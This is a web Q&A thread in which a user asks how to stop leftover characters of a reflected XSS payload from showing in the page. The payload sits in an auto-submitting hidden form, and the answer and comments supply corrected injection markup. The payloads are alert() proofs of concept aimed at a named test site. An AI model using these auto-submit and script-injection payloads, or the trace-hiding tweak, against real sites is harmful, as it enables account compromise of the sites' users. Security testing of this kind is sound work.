# XSS: Character showing in DOM

Tags: javascript, html, security, web, xss

I have created an html page that redirects user to a test site that has an XSS vulnerability. I am able to successfully execute javascript via the vulnerability. However, I have found that some of the characters I am using as part of the XSS attack are displaying in the DOM. How can I hide these characters from showing in the DOM?

```
<body onload="document.forms[0].submit()">
    <form action="http://sometestsite.com" method="POST">
      <input 
        type="hidden"
        name="login"
        value='"><script>alert(document.location)</script>'
      </input>
    </form>
  </body>
```

[image]

Answer (score 0):

Typo Error `value='"` & remove last `' />`

```
<form action="http://sometestsite.com" method="POST">
      <input type="hidden"
        name="login"
        value="" /><script>alert(3)</script>
    </form>
```

```html
<body onload="document.forms[0].submit()">
    <form action="http://sometestsite.com" method="POST">
      <input type="hidden"
        name="login"
        value=""><script>alert(3)</script>
    </form>
  </body>
```

Comment: @ChrisSmith make the input tag self closed.

Comment: @Teemu Can you provide an example of the change?

Comment: Issue still persists.


 <input 
 type="hidden"
        name="login"
        value='"><script>alert(document.location)</script>' 
      />

Comment: Please be more careful when writing ... Does that look like a self-closed `input`??? You can't nest a tag inside of a tag, you need separate tags for the input and the script.

Comment: @Teemu I am trying to achieve XSS. How would I be able to inject XSS with a self closed input???

Comment: @ChrisSmith Usually you don't.